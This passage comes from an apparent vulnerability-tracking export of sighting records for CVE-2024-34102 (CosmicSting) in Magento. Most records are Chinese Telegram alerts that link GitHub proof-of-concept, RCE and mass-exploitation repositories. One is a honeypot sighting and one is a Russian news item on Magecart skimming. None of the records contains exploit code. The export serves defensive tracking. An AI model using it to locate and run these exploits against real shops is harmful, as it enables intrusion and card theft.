"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7798", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aMagento XXE (CVE-2024-34102)\nURL\uff1ahttps://github.com/0x0d3ad/CVE-2024-34102\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-30T16:54:32.000000Z"}, {"uuid": "2038826a-8cad-4361-89b9-c9191c32ccf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7791", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aTEST CVE-2024-34102 Magento XXE\nURL\uff1ahttps://github.com/cmsec423/CVE-2024-34102\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-29T06:03:29.000000Z"}, {"uuid": "d1b331f8-f26d-4948-ad0d-29a5c1e22147", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7772", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce\nURL\uff1ahttps://github.com/dr3u1d/CVE-2024-34102-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-28T00:05:15.000000Z"}, {"uuid": "152c1bb8-707c-4f09-a316-8d03ca2a154f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7771", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce. \nURL\uff1ahttps://github.com/bigb0x/CVE-2024-34102\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-27T22:01:14.000000Z"}, {"uuid": "6adfef83-9f7b-4e64-8d89-46304f4ded9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7770", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34102: Unauthenticated Magento XXE\nURL\uff1ahttps://github.com/th3gokul/CVE-2024-34102\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-27T18:41:27.000000Z"}, {"uuid": "2bd5aac8-d38d-4b9b-9195-60b672d9d1e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7763", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce\nURL\uff1ahttps://github.com/ex-arny/CVE-2024-34102-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-26T12:22:10.000000Z"}, {"uuid": "dece9ded-3135-4743-94a5-a872748f965d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7800", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-34102 : Unauthenticated Magento XXE and bypassing WAF , You will get http connection on ur webhook\nURL\uff1ahttps://github.com/11whoami99/CVE-2024-34102\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-01T03:22:56.000000Z"}, {"uuid": "27eea0f0-3089-466c-8bb9-44766d36e775", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7910", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1apoc for CVE-2024-34102 \nURL\uff1ahttps://github.com/unknownzerobit/poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-08T11:25:29.000000Z"}, {"uuid": "ce11f00b-a1f6-4a3f-85c2-57248358f1a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7956", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce\nURL\uff1ahttps://github.com/1mpl3ment3d/CVE-2024-34102-RCE-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-12T11:20:39.000000Z"}, {"uuid": "dc22280f-5bf0-4429-a8d8-470da442dc70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7972", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34102 made Python code\nURL\uff1ahttps://github.com/bughuntar/CVE-2024-34102-Python\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-13T17:35:59.000000Z"}, {"uuid": "c6faec4f-a2e7-4639-8a98-984a79c4bd51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7899", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCosmicSting (CVE-2024-34102) POC / Patch Validator\nURL\uff1ahttps://github.com/SamJUK/cosmicsting-validator\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-08T00:05:56.000000Z"}, {"uuid": "596e0039-7ef3-4b0d-a4bd-3aeb73f14b65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8121", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce\nURL\uff1ahttps://github.com/etx-Arn/CVE-2024-34102-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-30T04:46:31.000000Z"}, {"uuid": "3b41ca49-4494-492e-bc06-a8b0de90adfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7934", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce\nURL\uff1ahttps://github.com/Ex-Arn/CVE-2024-34102-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-10T16:44:20.000000Z"}, {"uuid": "5aa93e28-641a-42c8-a44d-729188a7aeb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7969", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aMass Exploitation CVE-2024-34102\nURL\uff1ahttps://github.com/bughuntar/CVE-2024-34102\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-05T05:34:59.000000Z"}, {"uuid": "d09c119b-64ea-4254-85de-1443829ea690", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-20)", "content": "", "creation_timestamp": "2026-04-20T00:00:00.000000Z"}, {"uuid": "85670fa2-78ba-4bd2-9aa7-6ce93c92c5c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8199", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aMagento 2 patch for CVE-2024-34102(aka CosmicSting). Another way(as an extension) to hotfix the security hole if you cannot apply the official patch or cannot upgrade Magento.\nURL\uff1ahttps://github.com/wubinworks/magento2-cosmic-sting-patch\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-08T08:41:31.000000Z"}, {"uuid": "237815fe-080f-4e97-95cb-635e5c2bfddb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8147", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce\nURL\uff1ahttps://github.com/etx-Arn/CVE-2024-34102-RCE-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-01T17:37:54.000000Z"}, {"uuid": "22241e23-a5fd-4ad8-bc2f-cb96f11e1c54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8252", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC for CVE-2024-34102\nURL\uff1ahttps://github.com/EQSTSeminar/CVE-2024-34102\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-13T07:37:43.000000Z"}, {"uuid": "471afa7b-1b7a-44a5-b242-48114d548714", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7990", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce\nURL\uff1ahttps://github.com/b4h1x/CVE-2024-34102-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-15T15:10:30.000000Z"}, {"uuid": "a8c7e1fe-478d-4639-a358-5dfa19509726", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8034", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce and (NEW 0DAY)?\nURL\uff1ahttps://github.com/ex-ARnX/CVE-2024-34102-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-21T00:24:09.000000Z"}, {"uuid": "12f7f0a9-6b5f-4ff6-be55-f8f9a026d8f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7801", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)\nURL\uff1ahttps://github.com/jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-01T08:23:28.000000Z"}, {"uuid": "468c84ad-9d23-4e9a-b5f8-47cfb90519ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://t.me/itsec_news/5097", "content": "\u200b\u26a1\ufe0fGoogle Tag Manager \u0441\u0442\u0430\u043b \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c \u043a\u0440\u0430\u0436\u0438 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445\n\n\ud83d\udcac\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043d\u043e\u0432\u043e\u043c\u0443 \u043e\u0442\u0447\u0435\u0442\u0443 Trustwave, \u0432 \u043f\u0440\u0435\u0434\u0434\u0432\u0435\u0440\u0438\u0438 \u043f\u0440\u0430\u0437\u0434\u043d\u0438\u0447\u043d\u043e\u0433\u043e \u0441\u0435\u0437\u043e\u043d\u0430 \u0445\u0430\u043a\u0435\u0440\u044b \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0441\u0430\u0439\u0442\u044b \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438 \u0441 \u0446\u0435\u043b\u044c\u044e \u043a\u0440\u0430\u0436\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u0445 \u043a\u0430\u0440\u0442 \u0438 \u043b\u0438\u0447\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438. \u0410\u0442\u0430\u043a\u0438 Magecart, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u043d\u0430\u0447\u0430\u043b\u0438 \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0432 2015 \u0433\u043e\u0434\u0443, \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u044b\u0445 \u0443\u0433\u0440\u043e\u0437 \u0434\u043b\u044f \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0435\u0432 \u043e\u043d\u043b\u0430\u0439\u043d-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432.\n\nMagecart \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u0448\u0438\u0440\u043e\u043a\u043e\u043c\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Magento, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u0441\u0442\u0440\u043e\u0435\u043d\u044b \u0442\u044b\u0441\u044f\u0447\u0438 \u043e\u043d\u043b\u0430\u0439\u043d-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u041f\u0430\u043d\u0434\u0435\u043c\u0438\u044f 2020 \u0433\u043e\u0434\u0430 \u0443\u0441\u0438\u043b\u0438\u043b\u0430 \u0443\u0433\u0440\u043e\u0437\u0443, \u0442\u0430\u043a \u043a\u0430\u043a \u043f\u0435\u0440\u0435\u0445\u043e\u0434 \u043d\u0430 \u043e\u043d\u043b\u0430\u0439\u043d-\u043f\u043e\u043a\u0443\u043f\u043a\u0438 \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u043b \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a.\n\n\u0425\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0430\u0439\u0442\u0430\u043c. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435, \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445 \u0438\u043b\u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0441\u0430\u0439\u0442\u0430. \u0412 2024 \u0433\u043e\u0434\u0443 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438:\n\nCVE-2024-20720 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 9.1) \u2014 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Magento, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0432\u0448\u0430\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b. \u0410\u0442\u0430\u043a\u0438 \u043d\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u0432 \u0430\u043f\u0440\u0435\u043b\u0435 2024 \u0433\u043e\u0434\u0430, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u043b\u043e \u043a \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u044b\u043c \u0432\u0437\u043b\u043e\u043c\u0430\u043c \u0441\u0430\u0439\u0442\u043e\u0432.\nCosmicSting ( CVE-2024-34102 \u0438 CVE-2024-2961 ) \u2014 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043e\u0448\u0438\u0431\u043a\u0438 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c, \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0438 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432. \u041a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u0434\u043e 75% \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c Adobe Commerce \u0438 Magento.\n\u041f\u043e\u0441\u043b\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0445\u0430\u043a\u0435\u0440\u044b \u0432\u043d\u0435\u0434\u0440\u044f\u044e\u0442 \u0441\u043a\u0438\u043c\u043c\u0435\u0440\u044b \u043d\u0430 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u0441\u0430\u0439\u0442\u043e\u0432, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u0438\u044f \u0437\u0430\u043a\u0430\u0437\u043e\u0432. \u0421\u043a\u0440\u0438\u043f\u0442\u044b \u0441\u043e\u0431\u0438\u0440\u0430\u044e\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043d\u043e\u043c\u0435\u0440\u0430 \u043a\u0430\u0440\u0442 \u0438 CVV-\u043a\u043e\u0434\u044b.\n\n\u0412 2024 \u0433\u043e\u0434\u0443 \u0443\u0447\u0430\u0441\u0442\u0438\u043b\u0438\u0441\u044c \u0441\u043b\u0443\u0447\u0430\u0438 \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c Google Tag Manager (GTM), \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u043c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0442\u0435\u043d\u0442\u043e\u043c. \u0425\u0430\u043a\u0435\u0440\u044b \u0441\u043e\u0437\u0434\u0430\u044e\u0442 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b GTM \u0438 \u0432\u043d\u0435\u0434\u0440\u044f\u044e\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0441\u043a\u0440\u0438\u043f\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0442\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u0441\u044f \u043d\u0430 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 \u0441\u0430\u0439\u0442\u0430\u0445. \u0422\u0430\u043a\u043e\u0439 \u043c\u0435\u0442\u043e\u0434 \u0442\u0440\u0443\u0434\u043d\u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c, \u0442\u0430\u043a \u043a\u0430\u043a GTM \u043a\u0430\u0436\u0435\u0442\u0441\u044f \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u043c.\n\n\u0421\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044f HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0438 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f WebSocket. \u0427\u0430\u0441\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u043e\u0434\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 Base64 \u0434\u043b\u044f \u0443\u0441\u043b\u043e\u0436\u043d\u0435\u043d\u0438\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430.\n\n\u0414\u043b\u044f \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u0438 \u0440\u0438\u0441\u043a\u043e\u0432 \u0430\u0442\u0430\u043a Magecart \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f:\n\n\u0421\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b \u0438 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f;\n\u041e\u0442\u043a\u043b\u044e\u0447\u0430\u0442\u044c \u043d\u0435\u043d\u0443\u0436\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u0438 \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u0435 \u0441\u043a\u0440\u0438\u043f\u0442\u044b;\n\u041d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0442\u044c Content Security 